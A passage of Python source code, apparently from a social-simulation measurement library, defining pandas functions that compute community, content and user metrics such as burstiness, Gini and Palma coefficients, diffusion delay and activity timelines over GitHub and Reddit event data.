= df[['user','value',community_field]].groupby([ pd.TimeGrouper(unit), 'user', community_field]).count()\n df = df.reset_index()\n\n #average the event counts across all users to get a single time series for the community\n df = df[['time','value',community_field]].groupby(['time',community_field]).mean().reset_index()\n df['value'] = pd.to_numeric(df['value'])\n df.columns = ['time','community','value']\n\n measurement = self.getCommunityMeasurementDict(df)\n\n return measurement\n\n\n def burstsInCommunityEvents(self,eventTypes=None,community_field=\"subreddit\"):\n \"\"\"\n Calculates the burstiness of inter-event times within the data set.\n Question #9\n Inputs: communities - Boolean to calculate the measurement seperately for each community (True) or for the full data set (False)\n 
eventTypes - List of event types to include in the data\n Output: Burstiness value (scalar)\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if eventTypes != None:\n df = df[df['event'].isin(eventTypes)]\n\n if len(df) == 0:\n return None\n\n def burstiness(grp):\n\n #get interevent times\n grp['diff'] = grp['time'].diff()\n grp['diff'] = grp['diff'] / np.timedelta64(1, 's')\n\n grp = grp[np.isfinite(grp['diff'])]\n\n mean = grp['diff'].mean()\n std = grp['diff'].std()\n if std + mean > 0:\n burstiness = (std - mean) / (std + mean)\n else:\n burstiness = 0\n\n return burstiness\n\n b = df.groupby(community_field).apply(burstiness)\n b.columns = ['community', 'value']\n\n measurement = self.getCommunityMeasurementDict(b)\n\n return measurement\n\n\n def propIssueEvent(self,unit='D'):\n \"\"\"\n Calculates the proportion of different issue action types as a function of time.\n Question #8 (Optional Measurement)\n Inputs: communities - Boolean to calculate the measurement seperately for each community (True) or for the full data set (False)\n unit - Temporal granularity for calculating the time series (e.g. D - day, H - hour, etc.)\n Output: Dictionary of data frames for each community\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if self.main_df_opt is not None:\n\n df = df[ (df['event'] == 'IssuesEvent') ]\n\n if len(df) == 0:\n return(None)\n\n #round times down to nearest unit\n df = df.assign(time=df.time.dt.floor(unit))\n\n #merge optional columns (action, merged) with primary data frame\n df = df.merge(self.main_df_opt,how='left',left_index=True,right_index=True)\n\n df = df[(df['action'].isin(['opened','closed','reopened']))]\n\n if len(df) == 0:\n return(None)\n\n df = df[['action','event','time','community']].groupby(['time','action','community']).count() #time,action,count\n df = df.reset_index()\n\n p = df\n p.columns = ['time','action', 'community','counts']\n\n #create one column for each action type holding the counts of that action type\n p = pd.pivot_table(p,index=['time','community'],columns='action', values='counts').fillna(0)\n p = p.reset_index()\n p = pd.melt(p, id_vars=['time','community'], value_vars=['closed', 'opened', 'reopened'])\n p.columns = ['time','community','action', 'value']\n\n measurement = self.getCommunityMeasurementDict(p)\n\n return measurement\n else:\n return None\n\n\n def ageOfAccounts(self,eventTypes=None,community_field=\"subreddit\"):\n \"\"\"\n Calculates the distribution of user account ages for users who are active in the data.\n Question #10\n Inputs: df - Events data\n eventTypes - List of event types to include in the data\n Output: A pandas Series containing account age of the user for each action taken in the community\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if self.useUserMetaData:\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n\n df = df.merge(self.created_at_df, left_on='user', right_on='user', how='inner')\n df = df.sort_values(['time'])\n\n #get user account age at the time of each event\n df['age'] = df['time'].sub(df['created_at'], axis=0)\n df['age'] = df['age'].astype('timedelta64[D]')\n\n df = df.rename(index=str, columns={community_field: \"community\"})\n df.set_index('community')\n\n measurement = self.getCommunityMeasurementDict(df['age'])\n\n return df['age']\n else:\n warnings.warn('Skipping ageOfAccountsHelper because metadata file is required')\n return None\n\n\n def 
userGeoLocation(self,eventTypes=None,community_field=\"subreddit\"):\n \"\"\"\n A function to calculate the distribution of user geolocations for users active in each community\n Question #21\n Inputs: df - Events data frame\n eventTypes - List of event types to include in the data\n Output: Data frame with the location distribution of activity in the data\n \"\"\"\n df = self.communityDF.copy()\n\n if not eventTypes is None:\n df = df[df.event.isin(eventTypes)]\n\n if len(df) == 0:\n return None\n\n if self.useUserMetaData:\n\n #merge events data with user location metadata\n merge = df.merge(self.locations_df, left_on='user', right_on='user', how='inner')\n merge = merge[['user','country',community_field]].groupby([community_field,'country']).count().reset_index()\n merge.columns = ['community','country','value']\n\n community_totals = merge.groupby(community_field)['value'].sum().reset_index()\n community_totals.columns = ['community','total']\n merge = merge.merge(community_totals,on='community',how='left')\n merge['value'] = merge['value']/merge['total']\n\n print('merge',merge)\n\n #set rare locations to \"other\"\n thresh = 0.007\n merge['country'][merge['value'] < thresh] = 'other'\n\n #sum over other countries\n grouped = merge.groupby([community_field,'country']).sum().reset_index()\n\n print('grouped',grouped)\n\n measurement = self.getCommunityMeasurementDict(grouped)\n\n return measurement\n else:\n warnings.warn('Skipping userGeoLocationHelper because metadata file is required')\n return {}\n\n\n def getUserBurstByCommunity(self,eventTypes=None,thresh=5.0,community_field=\"subreddit\"):\n \"\"\"\n Calculate the distribution of user inter-event time burstiness in the data set.\n Question #9\n Inputs: df - Events data frame\n eventTypes - List of event types to include in the data\n thresh - Minimum number of events for a user to be included\n Output: Data frame of user burstiness values\n \"\"\"\n df = self.communityDF.copy()\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n if len(df) == 0:\n return None\n\n #only calculate burstiness for users which have sufficient activity\n users = df.groupby(['user',community_field])\n user_counts = users['event'].count().reset_index()\n user_list = user_counts[user_counts['event'] >= thresh]\n user_list.columns = ['user',community_field,'total_activity']\n\n if len(user_list) == 0:\n return None\n\n df = df.merge(user_list,how='inner',on=['user',community_field])\n\n def user_burstiness(grp):\n #get interevent times for each user seperately\n if len(grp['user'].unique()) > 1:\n grp = grp.groupby('user').apply(lambda grp: (grp.time - grp.time.shift()).fillna(0)).reset_index()\n else:\n grp['time'] = grp['time'] - grp['time'].shift().dropna()\n\n grp['value'] = grp['time'] / np.timedelta64(1, 's')\n\n #calculate burstiness using mean and standard deviation of interevent times\n grp = grp.groupby('user').agg({'value':{'std':np.std,'mean':np.mean}})\n\n grp.columns = grp.columns.get_level_values(1)\n grp['value'] = (grp['std'] - grp['mean']) / (grp['std'] + grp['mean'])\n\n grp = grp[['value']].dropna().reset_index()\n\n return grp\n\n b = df.groupby(community_field).apply(user_burstiness).reset_index()[[community_field,'value']].set_index(community_field)['value']\n\n measurement = self.getCommunityMeasurementDict(b)\n\n return measurement\n\n\n def getCommunityGini(self,communities=True,eventTypes=None,community_field=\"subreddit\",content_field=\"root\"):\n \"\"\"\n Wrapper function calculate the gini coefficient for the 
data frame.\n Question #6\n Input: communities - Boolean to calculate the measurement separately for each community (True) or for the full data set (False)\n eventTypes - A list of event types to include in the calculation\n Output: A dictionary of gini coefficients for each community\n \"\"\"\n if len(self.communityDF) > 0:\n ginis = self.communityDF.groupby(community_field).apply(lambda x: self.getGiniCoefHelper(x,content_field))\n\n measurement = self.getCommunityMeasurementDict(ginis)\n\n return measurement\n else:\n return None\n\n\n def getCommunityPalma(self,communities=True,eventTypes=None,community_field=\"subreddit\",content_field=\"root\"):\n \"\"\"\n Wrapper function to calculate the Palma coefficient for the data frame.\n Question #6\n Input: communities - Boolean to calculate the measurement separately for each community (True) or for the full data set (False)\n eventTypes - A list of event types to include in the calculation\n Output: A dictionary of Palma coefficients for each community\n \"\"\"\n if len(self.communityDF) > 0:\n\n palmas = self.communityDF.groupby(community_field).apply(lambda x: self.getPalmaCoefHelper(x,content_field))\n\n measurement = self.getCommunityMeasurementDict(palmas)\n\n return measurement\n\n else:\n return None\n\n\n def getNodeDictionary(self,df):\n meas = {}\n for content in df.content.unique():\n meas[content] = df[df.content == content]\n del meas[content][\"content\"]\n\n return meas\n\n\n def getSelectContentIds(self, content_ids):\n \"\"\"\n This function creates a dictionary of data frames with\n each entry being the activity of one piece of content from the content_ids\n argument.\n\n This is used for the selected content ids for the node-level measurements.\n Inputs: content_ids - List of content ids (e.g. GitHub - full_name_h, etc.)\n Output: Dictionary of data frames with the content ids as the keys\n \"\"\"\n contentDic = {}\n for ele in content_ids:\n d = self.main_df[self.main_df['content'] == ele]\n contentDic[ele] = d\n\n return contentDic\n\n\n def runSelectContentIds(self, method, *args):\n \"\"\"\n This function runs a particular measurement (method) on the\n content ids that were selected by getSelectContentIds.\n\n This is used for the selected content IDs for the node-level measurements.\n\n Inputs: method - Measurement function\n Output: Dictionary of measurement results with the content ids as the keys\n \"\"\"\n ans = {}\n for ele in self.selectedContent.keys():\n df = self.selectedContent[ele].copy()\n ans[ele] = method(df,*args)\n\n return ans\n\n\n def getContentDiffusionDelay(self, eventTypes=None, selectedContent=True, time_bin='m',content_field='root'):\n \"\"\"\n This method returns the distribution of the diffusion delay for each content node.\n Question #1\n Inputs: DataFrame - Data\n eventTypes - A list of events to filter data on\n selectedContent - A boolean indicating whether to run on selected content nodes\n time_bin - Time unit for time differences, e.g. \"s\",\"d\",\"h\"\n Output: A dictionary with a data frame for each content ID containing the diffusion delay values in the given units\n \"\"\"\n df = self.selectedContent.copy()\n\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n if len(df.index) == 0:\n return {}\n\n #use metadata for content creation dates if available\n if self.useContentMetaData:\n df = df.merge(self.contentMetaData,left_on=content_field,right_on=content_field,how='left')\n df = df[[content_field,'created_at','time']].dropna()\n df['value'] = (df['time']-df['created_at']).apply(lambda x: int(x / np.timedelta64(1, time_bin)))\n #otherwise use first observed activity as a proxy\n else:\n creation_day = df.groupby(content_field)['time'].min().reset_index()\n creation_day.columns = [content_field,'creation_date']\n df = df.merge(creation_day, on=content_field, how='left')\n df['value'] = (df['time']-df['creation_date']).apply(lambda x: int(x / np.timedelta64(1, time_bin)))\n df = df[[content_field,'value']]\n df.columns = ['content','value']\n df = df.iloc[1:]\n\n measurements = self.getNodeDictionary(df)\n\n return measurements\n\n\n def getContentGrowth(self, eventTypes=None, cumSum=False, time_bin='D', content_field='root'):\n \"\"\"\n This method returns the growth of a repo over time.\n Question #2\n Input: eventTypes - A list of events to filter data on\n cumSum - This is a boolean that indicates if the dataframe should be cumulative over time.\n time_bin - The temporal granularity of the output time series\n output - A dictionary with a dataframe for each content id that describes the content activity growth.\n \"\"\"\n df = self.selectedContent\n\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n df = df.set_index(\"time\")\n\n measurement = df[[content_field,'event']].groupby([content_field,pd.Grouper(freq=time_bin)]).count()\n measurement.columns = ['value']\n\n if cumSum:\n measurement['value'] = measurement.cumsum(axis=0)['value']\n measurement = measurement.reset_index()\n measurement.columns = ['content','time','value']\n\n measurements = self.getNodeDictionary(measurement)\n\n return measurements\n\n\n def getContributions(self, new_users_flag=False, cumulative=False, eventTypes=None, time_bin='H', content_field=\"root\"):\n \"\"\"\n Calculates the total number of unique daily contributors to a repo or the unique daily contributors who are new contributors\n Question # 4\n Input: new_users_flag - Boolean to indicate whether to calculate total daily unique users (False) or daily new contributors (True)\n cumulative - Boolean to indicate whether or not the metric should be cumulative over time\n eventTypes - A list of event types to include in the calculation\n time_bin - Granularity of time series\n Output: A data frame with daily event counts\n \"\"\"\n df = self.selectedContent.copy()\n\n def contributionsInsideHelper(dfH,newUsersOnly,cumulative):\n if newUsersOnly:\n #drop duplicates on user so a new user only shows up once in the data\n dfH = dfH.drop_duplicates(subset=['user'])\n\n p = dfH[[content_field,'user']].groupby([content_field,pd.Grouper(freq=time_bin)])['user'].nunique().reset_index()\n\n if cumulative:\n #get cumulative user counts\n p['user'] = p.groupby(content_field)['user'].transform(pd.Series.cumsum)\n\n p.columns = ['content','time','value']\n return p\n\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n df = df.set_index(\"time\")\n\n if not new_users_flag:\n #run total daily user counts\n results = contributionsInsideHelper(df, False, cumulative)\n else:\n #run daily new-contributor counts\n results = contributionsInsideHelper(df, True, cumulative)\n\n meas = self.getNodeDictionary(results)\n\n return meas\n\n\n def getDistributionOfEvents(self,weekday=False,content_field=\"root\"):\n \"\"\"\n This method returns the distribution for each event over time or by weekday. Default is over time.\n Question #5\n Inputs: weekday - (Optional) Boolean to indicate whether the distribution should be done by weekday. Default is False.\n Output: Dataframe with the distribution of events by weekday. Columns: Event, Weekday, Count or Event, Date, Count\n \"\"\"\n df = self.selectedContent.copy()\n\n df['id'] = df.index\n df['weekday'] = df['time'].dt.day_name()\n df['date'] = df['time'].dt.date\n\n if weekday:\n col = 'weekday'\n else:\n col = 'date'\n\n counts = df.groupby([content_field,'event',col])['user'].count().reset_index()\n counts.columns = ['content','event',col,'value']\n\n meas = self.getNodeDictionary(counts)\n\n return meas\n\n\n def processDistOfEvents(self,df,weekday):\n \"\"\"\n Helper function for getting the distribution of events per weekday.\n \"\"\"\n df.set_index('time', inplace=True)\n df['hour'] = df.index.hour\n df['day'] = df.index.day\n df['month'] = df.index.month\n df['year'] = df.index.year\n\n if weekday:\n df['weekday'] = df.apply(lambda x:datetime(x['year'],x['month'],x['day']).weekday(),axis=1)\n p = df[['event','user','weekday']].groupby(['event','weekday']).count()\n p = p.reset_index()\n return p\n\n else:\n p = df[['event', 'year', 'month', 'day','id']].groupby(['event', 'year', 'month','day']).count()\n p = pd.DataFrame(p).reset_index()\n p.columns = ['event', 'year', 'month','day','count']\n p['date'] = p.apply(lambda x: datetime.strptime(\"{0} {1} {2}\".format(x['year'], x['month'],x['day']), \"%Y %m %d\"), axis=1)\n p['date'] = p['date'].dt.strftime('%Y-%m-%d')\n p = p.reset_index()\n return p\n\n\n @check_empty(default=None)\n def getGiniCoef(self,nodeType='root', eventTypes=None, \n content_field=\"root\"):\n \"\"\"\n Wrapper function to calculate the Gini coefficient for the data frame.\n Question #6,14,26\n Input: df - Data frame containing the data; can be any subset of the data\n nodeType - Type of node to calculate the Gini coefficient over. Options: user or repo (case sensitive)\n eventTypes - A list of event types to include in the calculation\n Output: g - gini coefficient\n \"\"\"\n result = self.getGiniCoefHelper(self.main_df, nodeType, eventTypes, content_field)\n\n return result\n\n\n def getGiniCoefHelper(self, df, nodeType, eventTypes=None, \n content_field=\"root\"):\n \"\"\"\n This method returns the Gini coefficient for the data frame.\n Question #6,14,26\n Input: df - Data frame containing the data; can be any subset of the data\n nodeType - Type of node to calculate the Gini coefficient over. 
Options: user or repo (case sensitive)\n eventTypes - A list of event types to include in the calculation\n Output: g - gini coefficient\n \"\"\"\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n if len(df) == 0:\n return None\n\n #count events for given node type\n if nodeType != 'user':\n df = df[[nodeType, 'user']].groupby(nodeType).count()\n else:\n df = df[[nodeType, content_field]].groupby(nodeType).count()\n\n df.columns = ['value']\n df = df.reset_index()\n\n values = df['value'].values.astype(float)\n\n if np.amin(values) < 0:\n values -= np.amin(values)\n\n values += 1e-9\n\n values = np.sort(np.array(values))\n\n index = np.arange(1,values.shape[0]+1)\n n = values.shape[0]\n g = ((np.sum((2 * index - n - 1) * values)) / (n * np.sum(values)))\n\n return g\n\n\n def getPalmaCoef(self,nodeType='root', eventTypes=None, content_field=\"root\"):\n \"\"\"\n Wrapper function calculate the Palma coefficient for the data frame.\n Question #6,14,26\n Input: df - Data frame containing data can be any subset of data\n nodeType - Type of node to calculate the Palma coefficient over. Options: user or repo (case sensitive)\n eventTypes - A list of event types to include in the calculation\n Output: Palma coefficient\n \"\"\"\n result = self.getPalmaCoefHelper(self.main_df, nodeType,eventTypes,content_field)\n\n return result\n\n @check_empty(default=None)\n def getPalmaCoefHelper(self, df, nodeType='root', eventTypes=None, content_field = \"root\"):\n \"\"\"\n This method returns the Palma coefficient.\n Question #6,14,26\n Input: df - Data frame containing data can be any subset of data\n nodeType - (Optional) This is the node type on whose event counts the Palma coefficient\n is calculated. Options: user or content (case sensitive)\n eventTypes - A list of event types to include in the calculation\n Output: p - Palma Coefficient\n \"\"\"\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n if nodeType != 'user':\n df = df[[nodeType, 'user']].groupby(nodeType).count()\n else:\n df = df[[nodeType, content_field]].groupby(nodeType).count()\n\n df.columns = ['value']\n df = df.reset_index()\n\n values = df['value'].values\n values = np.sort(np.array(values))\n percent_nodes = np.arange(1, len(values) + 1) / float(len(values))\n\n #percent of events taken by top 10% of nodes\n p10 = np.sum(values[percent_nodes >= 0.9])\n #percent of events taken by bottom 40% of nodes\n p40 = np.sum(values[percent_nodes <= 0.4])\n\n try:\n p = float(p10) / float(p40)\n except ZeroDivisionError:\n return None\n\n return p\n\n\n def getTopKContent(self,content_field='root',k=100,eventTypes=None):\n \"\"\"\n This method returns the top-k pieces of content by event count for selected event types\n Question #12,13\n Inputs: eventTypes - A list of event types to include in the calculation\n content_field - Options: root, parent, or content.\n k - Number of entities to return\n Outputs: Dataframe with the top-k content ids and their event counts. Columns are content id and the count of that event.\n \"\"\"\n df = self.main_df.copy()\n\n if not eventTypes is None:\n df = df[df.event.isin(eventTypes)]\n p = df[[content_field, 'event']].groupby([content_field]).count()\n p = p.sort_values(by='event',ascending=False)\n p.columns = ['value']\n\n return p.head(k)\n\n\n def getDistributionOfEventsByContent(self, content_field='root', eventTypes=['WatchEvent']):\n \"\"\"\n This method returns the distribution of event type per content e.g. 
x repos/posts/tweets with y number of events,\n z repos/posts/ with n amounts of events.\n Question #11,12,13\n Inputs: eventTypes - List of event type(s) to get distribution over\n Outputs: Dataframe with the distribution of event type per repo. Columns are repo id and the count of that event.\n \"\"\"\n df = self.main_df.copy()\n\n if eventTypes != None:\n df = df[df['event'].isin(eventTypes)]\n\n p = df[[content_field,'time']].groupby(content_field).count()\n p = p.sort_values(by='time')\n p.columns = ['value']\n p = p.reset_index()\n return p\n\n\n def getRepoPullRequestAcceptance(self,eventTypes=['PullRequestEvent'],thresh=2):\n \"\"\"\n Calculate the proportion of pull requests that are accepted for each repo.\n Question #15 (Optional Measurement)\n Inputs: eventTypes: List of event types to include in the calculation (Should be PullRequestEvent).\n thresh: Minimum number of PullRequests a repo must have to be included in the distribution.\n Output: Data frame with the proportion of accepted pull requests for each repo\n \"\"\"\n #check if optional columns exist\n if not self.main_df_opt is None and 'PullRequestEvent' in self.main_df.event.values:\n\n df = self.main_df_opt.copy()\n\n idx = (self.main_df.event.isin(eventTypes)) & (df.merged.isin([True,False,\"True\",\"False\"]))\n\n df = df[idx]\n users_repos = self.main_df[idx]\n\n df['merged'] = df['merged'].map({\"True\":True,\"False\":False})\n\n if len(df) == 0:\n return None\n\n #subset to only pull requests which are being closed (not opened)\n idx = df['action'] == 'closed'\n closes = df[idx]\n users_repos = users_repos[idx]\n\n #merge optional columns (action, merged) with the main data frame columns\n closes = pd.concat([users_repos,closes],axis=1)\n closes = closes[['content','merged']]\n closes['value'] = 1\n\n #create count of accepted (merged) and rejected pull requests by repo\n outcomes = closes.pivot_table(index=['content'],values=['value'],columns=['merged'],aggfunc='sum').fillna(0)\n\n outcomes.columns = outcomes.columns.get_level_values(1)\n\n outcomes = outcomes.rename(index=str, columns={True: \"accepted\", False: \"rejected\"})\n\n #if only accepted or reject observed in data, create other column and fill with zero\n for col in ['accepted','rejected']:\n if col not in outcomes.columns:\n outcomes[col] = 0\n\n #get total number of pull requests per repo by summing accepted and rejected\n outcomes['total'] = outcomes['accepted'] + outcomes['rejected']\n #get proportion\n outcomes['value'] = outcomes['accepted'] / outcomes['total']\n\n #subset on content which have enough data\n outcomes = outcomes[outcomes['total'] >= thresh]\n\n if len(outcomes.index) > 0:\n measurement = outcomes.reset_index()[['content','value']]\n else:\n measurement = None\n else:\n measurement = None\n\n return measurement\n\n\n def getEventTypeRatioTimeline(self, eventTypes=None, event1='IssuesEvent', event2='PushEvent', content_field=\"root\"):\n if self.platform!='reddit':\n df = self.selectedContent.copy()\n else:\n df = self.main_df.copy()\n\n if eventTypes != None:\n df = df[df['event'].isin(eventTypes)]\n\n df['value'] = 1\n\n if len(df.index) < 1:\n return {}\n\n grouped = df.groupby([content_field, 'user'])\n\n if len(grouped) > 1:\n measurement = grouped.apply(lambda x: x.value.cumsum()).reset_index()\n measurement['event'] = df['event'].reset_index(drop=True)\n else:\n measurement = df.copy()\n measurement['value'] = df['value'].cumsum()\n measurement['event'] = df['event']\n\n measurement = 
measurement[measurement['event'].isin([event1,event2])]\n\n measurement[event1] = measurement['event'] == event1\n measurement[event2] = measurement['event'] == event2\n\n measurement['next_event_' + event1] = measurement[event1].shift(-1)\n measurement['next_event_' + event2] = measurement[event2].shift(-1)\n\n bins = np.logspace(-1,3.0,16)\n measurement['num_events_binned'] = pd.cut(measurement['value'],bins).apply(lambda x: np.floor(x.right)).astype(float)\n\n def ratio(grp):\n if float(grp['next_event_' + event2].sum()) > 0:\n return float(grp['next_event_' + event1].sum()) / float(grp['next_event_' + event2].sum())\n else:\n return 0.0\n\n if len(measurement.index) > 0:\n measurement = measurement.groupby([content_field,'num_events_binned']).apply(ratio).reset_index()\n measurement.columns = ['content','num_events_binned','value']\n else:\n #nothing to bin; return an empty result rather than passing None downstream\n return {}\n\n measurement = self.getNodeDictionary(measurement)\n\n return measurement\n\n\n def propUserContinue(self,eventTypes=None,content_field=\"root\"):\n if self.platform != 'reddit':\n df = self.selectedContent.copy()\n else:\n df = self.main_df.copy()\n\n #default to the full frame so data is always defined\n data = df\n if eventTypes is not None:\n data = data[data['event'].isin(eventTypes)]\n\n if len(data.index) > 1:\n data['value'] = 1\n grouped = data.groupby(['user',content_field])\n\n #get running count of user actions on each piece of content\n if grouped.ngroups > 1:\n measurement = grouped.apply(lambda grp: grp.value.cumsum()).reset_index()\n else:\n data['value'] = data['value'].cumsum()\n measurement = data.copy()\n\n #get total number of user actions on each piece of content\n grouped = measurement.groupby(['user',content_field]).value.max().reset_index()\n grouped.columns = ['user',content_field,'num_events']\n\n measurement = measurement.merge(grouped,on=['user',content_field])\n\n #boolean indicator of whether a given event is the last one by the user\n measurement['last_event'] = measurement['value'] == measurement['num_events']\n\n #bin by the number of previous events\n bins = np.logspace(-1,2.5,30)\n measurement['num_actions'] = pd.cut(measurement['value'],bins).apply(lambda x: np.floor(x.right)).astype(float)\n measurement['last_event'] = ~measurement['last_event']\n\n #get percentage of events within bin that are NOT the last event for a user\n measurement = measurement.groupby([content_field,'num_actions']).last_event.mean().reset_index()\n measurement.columns = ['content','num_actions','value']\n measurement = self.getNodeDictionary(measurement)\n\n else:\n measurement = {}\n\n return measurement\n\n
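 # [Editor's sketch; not part of the original socialsim file] The log-spaced\n # binning used in propUserContinue above maps raw event counts onto a small\n # set of activity levels; on a toy series (illustrative names) it behaves as:\n #\n # bins = np.logspace(-1, 2.5, 30) #30 edges from 0.1 to ~316\n # s = pd.Series([1, 5, 50, 200])\n # s_binned = pd.cut(s, bins).apply(lambda x: np.floor(x.right)).astype(float)\n #\n # Each count is replaced by the floored right edge of its bin, so the later\n # group-by averages the continue/stop indicator per activity level.\n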
 def determineDf(self, users, eventTypes):\n \"\"\"\n This function selects a subset of the full data set for a selected set of users and event types.\n Inputs: users - A boolean or a list of users. If it is a list of user ids (login_h) the data frame is subset on only this list of users.\n If it is True, then the pre-selected node-level subset is used. If False, then all users are included.\n eventTypes - A list of event types to include in the data set\n\n Output: A data frame with only the selected users and event types.\n \"\"\"\n if users is True:\n df = self.selectedUsers\n elif isinstance(users, list):\n #subset the full data set to the listed users\n df = self.main_df[self.main_df.user.isin(users)]\n else:\n df = self.main_df\n\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n return df\n\n\n def getUserUniqueContent(self, selectedUsers=False, eventTypes=None, content_field=\"root\"):\n \"\"\"\n This method returns the number of unique repos that a particular set of users contributed to\n Question #17\n Inputs: selectedUsers - A list of users of interest or a boolean indicating whether to subset to the node-level measurement users.\n eventTypes - A list of event types to include in the data\n content_field - CSV column which contains the content ID (e.g. nodeID, parentID, or rootID)\n Output: A dataframe with the user id and the number of repos contributed to\n \"\"\"\n df = self.determineDf(selectedUsers, eventTypes)\n df = df.groupby('user')\n data = df[content_field].nunique().reset_index()\n data.columns = ['user','value']\n return data\n\n\n def getUserActivityTimeline(self, selectedUsers=True,time_bin='1d',cumSum=False,eventTypes=None):\n \"\"\"\n This method returns the timeline of activity of the desired user over time, either in raw or cumulative counts.\n Question #19\n Inputs: selectedUsers - A list of users of interest or a boolean indicating whether to subset to node-level measurement users.\n time_bin - Time frequency for calculating event counts\n cumSum - Boolean indicating whether to calculate the cumulative activity counts\n eventTypes - List of event types to include in the data\n Output: A dictionary with a data frame for each user with two columns: date and event counts\n \"\"\"\n df = self.determineDf(selectedUsers,eventTypes)\n\n df['value'] = 1\n if cumSum:\n df['cumsum'] = df.groupby('user').value.transform(pd.Series.cumsum)\n df = df.groupby(['user',pd.Grouper(key='time',freq=time_bin)]).max().reset_index()\n df['value'] = df['cumsum']\n df = df.drop('cumsum',axis=1)\n else:\n df = df.groupby(['user',pd.Grouper(key='time',freq=time_bin)]).sum().reset_index()\n\n data = df.sort_values(['user', 'time'])\n\n measurements = {}\n for user in data['user'].unique():\n user_df = data[data['user'] == user]\n idx = pd.date_range(min(user_df.time), max(user_df.time))\n user_df = user_df.set_index('time')\n user_df = user_df.reindex(idx)\n user_df.index.names = ['time']\n user_df['user'].ffill(inplace=True)\n user_df['value'].fillna(0,inplace=True)\n\n measurements[user] = user_df.reset_index()\n del measurements[user]['user']\n\n return measurements\n\n
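 # [Editor's sketch; not part of the original file] The reindex-and-fill step in\n # getUserActivityTimeline above densifies each user's daily series; a minimal\n # standalone version of the same pandas pattern (toy names) would be:\n #\n # idx = pd.date_range(user_df.time.min(), user_df.time.max())\n # dense = user_df.set_index('time').reindex(idx) #missing days become NaN\n # dense['value'] = dense['value'].fillna(0) #no rows on a day means zero events\n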
 def getUserPopularity(self, k=5000, use_metadata=False, eventTypes=None, content_field='root'):\n \"\"\"\n This method returns the top k most popular users for the dataset, where popularity is measured\n as the total popularity of the repos created by the user.\n Question #25\n Inputs: k - (Optional) The number of users that you would like returned.\n use_metadata - External metadata file containing repo owners. Otherwise use first observed user with\n a creation event as a proxy for the repo owner.\n eventTypes - A list of event types to include\n Output: A dataframe with the user ids and number of events for that user\n \"\"\"\n df = self.determineDf(False,eventTypes)\n\n df['value'] = 1\n\n content_popularity = df.groupby(content_field)['value'].sum().reset_index()\n\n creation_event = ''\n if 'CreateEvent' in df.event.unique():\n creation_event = 'CreateEvent'\n elif 'post' in df.event.unique():\n creation_event = 'post'\n elif 'tweet' in df.event.unique():\n creation_event = 'tweet'\n\n if use_metadata:\n #merge content popularity with the owner information in content_metadata\n #drop data for which no owner information exists in metadata\n merged = content_popularity.merge(self.repoMetaData,left_on=content_field,right_on='full_name_h',\n how='left').dropna()\n elif df[content_field].str.match('.{22}/.{22}').all():\n #if all content IDs have the correct format use the owner info from the content id\n content_popularity['owner_id'] = content_popularity[content_field].apply(lambda x: x.split('/')[0])\n elif creation_event != '':\n #otherwise use creation event as a proxy for ownership\n user_content = df[df['event'] == creation_event].sort_values('time').drop_duplicates(subset=content_field,keep='first')\n user_content = user_content[['user',content_field]]\n user_content.columns = ['owner_id', content_field]\n if len(user_content.index) > 0:\n content_popularity = user_content.merge(content_popularity,on=content_field,how='left')\n else:\n return None\n else:\n return None\n\n measurement = content_popularity.groupby('owner_id').value.sum().sort_values(ascending=False).head(k)\n measurement = pd.DataFrame(measurement).sort_values('value',ascending=False).reset_index()\n\n return measurement\n\n\n def getAvgTimebwEventsUsers(self, selectedUsers=True, nCPU=1):\n \"\"\"\n This method returns the average time between events for each user\n\n Inputs: df - Data frame of all data for repos\n users - (Optional) List of specific users to calculate the metric for\n nCPU - (Optional) Number of CPUs used to run the metric in parallel\n Outputs: A list of average times for each user. Length should match the number of users\n \"\"\"\n df = self.determineDf(selectedUsers, None)\n users = df['user'].unique()\n args = [(df, user) for user in users]\n #pp is expected to be a process-pool module (e.g. pathos.pools) imported at module level\n pool = pp.ProcessPool(nCPU)\n deltas = pool.map(self.getMeanTimeUserHelper, args)\n\n return deltas\n\n\n def getMeanTimeUser(self,df, user):\n \"\"\"\n Helper function for getting the average time between events\n\n Inputs: Same as average time between events\n Output: Same as average time between events\n \"\"\"\n d = df[df.user == user]\n d = d.sort_values(by='time')\n delta = np.mean(np.diff(d.time)) / np.timedelta64(1, 's')\n return delta\n\n\n def getMeanTimeUserHelper(self, args):\n\n return self.getMeanTimeUser(*args)\n\n
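 # [Editor's sketch; not part of the original file] getMeanTimeUser above relies on\n # np.diff over time-sorted rows; the unit conversion can be sanity-checked on toy data:\n #\n # times = pd.Series(pd.to_datetime(['2020-01-01 00:00', '2020-01-01 01:00', '2020-01-01 03:00']))\n # np.mean(np.diff(times)) / np.timedelta64(1, 's') #-> 5400.0, i.e. a mean gap of 1.5 hours\n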
 def getUserDiffusionDelay(self,unit='h', selectedUser=True,eventTypes=None):\n \"\"\"\n This method returns the distribution of the diffusion delay for each user\n Question #27\n Inputs: DataFrame - Desired dataset\n unit - (Optional) This is the unit that you want the distribution in. Check np.timedelta64 documentation\n for the possible options\n metadata_file - File containing user account creation times. Otherwise use first observed action of user as proxy for account creation time.\n Output: A list (array) of deltas in units specified\n \"\"\"\n df = self.determineDf(selectedUser,eventTypes)\n\n df['value'] = df['time']\n df['value'] = pd.to_datetime(df['value'])\n df['value'] = df['value'].dt.round('1H')\n\n if self.useUserMetaData:\n df = df.merge(self.UserMetaData[['user','created_at']],left_on='user',right_on='user',how='left')\n df = df[['user','created_at','value']].dropna()\n measurement = df['value'].sub(df['created_at']).apply(lambda x: int(x / np.timedelta64(1, unit)))\n else:\n grouped = df.groupby('user')\n transformed = grouped['value'].transform('min')\n measurement = df['value'].sub(transformed).apply(lambda x: int(x / np.timedelta64(1, unit)))\n return measurement\n\n\n def getMostActiveUsers(self,k=5000,eventTypes=None):\n \"\"\"\n This method returns the top k users with the most events.\n Question #24b\n Inputs: DataFrame - 